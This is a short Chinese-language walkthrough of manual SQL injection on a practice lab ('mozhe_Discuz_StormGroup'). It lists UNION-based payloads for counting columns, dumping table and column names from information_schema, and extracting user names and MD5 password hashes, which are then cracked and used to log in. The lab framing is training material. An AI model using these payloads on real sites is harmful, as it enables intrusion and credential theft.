手工注入:
1.启动靶场,找到注入页。
?2.判断是否存在注入点。
在id=1后面加上单引号' 然后回车,页面显示不正常则存在注入点。
3.猜字段
order by 1 → 正常显示页面
order by 2?→ 正常显示页面
order by 3?→ 正常显示页面
order by 4→ 正常显示页面
?
?order by 5 → 显示页面不正常,所以,字段有4个。
4.联合注入
union select 1,2,3,4 (有4个字段数,所以写到4就行了)?
在id=1前面加一个减号-让它爆出数字,数字就是回显位,回显位在字段2和字段3上。
?
5.爆数据库
?union select 1,database(),version(),4? ? 【database():数据库名? ?version():? 数据库版本】
得到数据库名:mozhe_Discuz_StormGroup? ?数据库版本:5.7.22-0ubuntu0.16.04.1
?
6.爆表名
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = "数据库名"
得到2个表名:StormGroup_member、notice
7.爆列名?
union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name = "表名"
得到4个列名: id 、name、password、status
?
8.爆数据
union select 1,group_concat(列名),group_concat(列名),4 from 表名
得到两组数据,到MD5在线解密网站解密。md5在线解密破解,md5解密加密
解密后登陆账号密码即可。
?